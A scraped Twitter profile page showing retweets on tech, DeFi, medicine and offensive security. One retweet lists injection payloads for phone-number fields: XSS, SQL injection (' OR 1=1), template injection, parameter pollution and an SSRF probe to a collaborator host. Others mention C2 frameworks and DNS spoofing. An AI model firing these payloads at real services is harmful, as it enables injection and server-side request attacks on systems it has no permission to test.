:_:_:_:

1.6K posts

:_:_:_: banner
:_:_:_:

:_:_:_:

@mrgaphy

** REDACTED **

127.0.0.1 Katılım Haziran 2015
376 Takip Edilen540 Takipçiler
:_:_:_: retweetledi
Michael 🚀🚀🚀
Michael 🚀🚀🚀@monnarene·
Soon == 4 years I am delighted to announce that I have become a Google Developer Expert for Google Cloud. I am genuinely excited about the awesome community contributions that I will be making in the future 😁.
GIF
Michael 🚀🚀🚀@monnarene

Soon.

English
51
44
261
21.1K
:_:_:_: retweetledi
Frontron
Frontron@frontronhq·
Over 70% of asset value remains untapped by DeFi across all chains. Imagine the endless passive income possibilities you can unlock by joining a DeFi ecosystem. We aim to grow the DeFi ecosystem in Africa through free/paid bootcamps, courses and guides Follow for more updates
English
0
1
2
87
:_:_:_: retweetledi
IroncladDev
IroncladDev@IroncladDev·
Life of a Linux user
IroncladDev tweet media
English
48
857
3.3K
234.7K
:_:_:_: retweetledi
Hussein Daher
Hussein Daher@HusseiN98D·
Who from my friends is in cybersecurity / pentesting in Lebanon?
English
4
1
17
9.3K
:_:_:_: retweetledi
Kanhaiya Sharma 🇮🇳
Kanhaiya Sharma 🇮🇳@krishnsec·
Easy Admin access dev said login with admin/admin
Kanhaiya Sharma 🇮🇳 tweet mediaKanhaiya Sharma 🇮🇳 tweet media
English
12
19
183
19.8K
:_:_:_: retweetledi
Nick VanGilder
Nick VanGilder@nickvangilder·
Red teamers: Early on in my offensive security career, I relied heavily on popular C2 frameworks like Metasploit, PowerShell Empire, Cobalt Strike, etc. during my engagements. I’m sure this is probably fairly common for many of us in this space. However, somewhere along the way, it began to bother me that I didn’t really understand how C2 frameworks worked “under the hood”. So, I set out to address that. For better or worse, I decided that the solution to the problem was to write my own (very basic) C2 framework. I didn’t do this because I felt that the community needed yet another C2 framework (it doesn’t, and it definitely doesn’t need mine). I did it so that I could better understand key, foundational C2 concepts and improve my own personal red team tradecraft. The process of designing and coding a simple C2 framework actually helped me more than I had planned, and I wish I had done it sooner. Takeaway: if you are in the offensive security space and using OSTs created by others, I would highly encourage you to carve out time to learn how these tools work under the hood. I can promise you that you will learn a lot by doing this. If you want to check out my C2 framework or use it has a starting point for developing your own, please feel free. You can find the "Most Average C2 Ever" on GitHub, here: github.com/nickvangilder/…. If I can do it, you can do it. (And yes, I'm a terrible coder, but it works!)
English
22
79
505
107.8K
:_:_:_: retweetledi
Kamaldeen Kehinde
Kamaldeen Kehinde@kenkarmah·
#KBTC23 was a huge success! 🙏🏾 A heartfelt thank you to our incredible sponsors, partners, organizers, volunteers, hosts, and outstanding participants. Your feedback made us better this year. Let's keep pushing innovation! 💡👏🏽 #innovateNow
Kamaldeen Kehinde tweet mediaKamaldeen Kehinde tweet mediaKamaldeen Kehinde tweet mediaKamaldeen Kehinde tweet media
English
10
40
117
27.7K
:_:_:_: retweetledi
DC | David Lee
DC | David Lee@dccybersec·
Are you interested in freelancing in cybersecurity and automation services? I'm on the lookout for people who are interested in freelancing in Cybersecurity &/OR Automation of business processes within the IT industry with training starting immediately. If this sounds like you, please get in touch with me! #cybersecurity #freelancing #freelancer #automation #ai #workfromanywhere
DC | David Lee tweet media
English
538
169
1.1K
240.5K
:_:_:_: retweetledi
Mobile Hacker
Mobile Hacker@androidmalware2·
0-days exploited by #Predator spyware were delivered via man-in-the-middle (MITM) attack and 0-click vulnerability against #iOS and #Android In the video below, I demonstrated how an attacker - using just smartphone - can trigger DNS spoofing attack to redirect device on the same wi-fi network to attacker controlled website. Such domain could deliver phishing or 0-day as in the case of Predator's browser exploit blog.google/threat-analysi…
English
28
539
2.4K
435.8K
:_:_:_: retweetledi
Whitehat.NG 🇳🇬
Whitehat.NG 🇳🇬@ngwhitehat·
Attention all #cybersecurity professionals and enthusiasts! Join us for an exciting webinar on "Bug Reporting for Responsible Disclosure: A Guide to Ethical Hacking and Vulnerability Disclosure." In this webinar, we will explore the importance of bug reporting for responsible
Whitehat.NG 🇳🇬 tweet media
English
1
5
3
643
:_:_:_: retweetledi
Corben Leo
Corben Leo@hacker_·
I've made $500k+ from SSRF vulnerabilities. Here are my tricks:
Corben Leo tweet media
English
83
1.2K
4.4K
440K
:_:_:_: retweetledi
Ninad Mishra
Ninad Mishra@NinadMishra5·
Payloads to try on phone number input fields by @securinti XSs +441134960000;phone-context= Parameter pollution (1) +441134960000;phone-context=&phone-context=+442.. Parameter pollution (2) +441134960000;ext=1;ext=? SQL injection +441134960000;phone-context=' OR 1=1; -- Template injection +441134960000;phone-context={{22}}[ [33]]{{77}}{% debug %} {77}{7*’7} SSRF +441134960000;phone-context=burocoaborator.net #BugBounty #bugbountytips #Payload
English
24
156
362
17.1K
:_:_:_: retweetledi
Abdullahi Muritala
Abdullahi Muritala@InvisibleOpey·
4 Distinctions and 19 College Prizes later, including: ⁃Preclinicals ⁃Pathology ⁃O & G ⁃Paediatrics ⁃Surgery & ⁃Community Health Allow me to reintroduce myself, Dr. Muritala A.O MB;BS Hons (Ilorin) Best Graduating Student, Unilorin Medical Class of 2021.
Abdullahi Muritala tweet mediaAbdullahi Muritala tweet mediaAbdullahi Muritala tweet media
English
268
572
2.7K
226.5K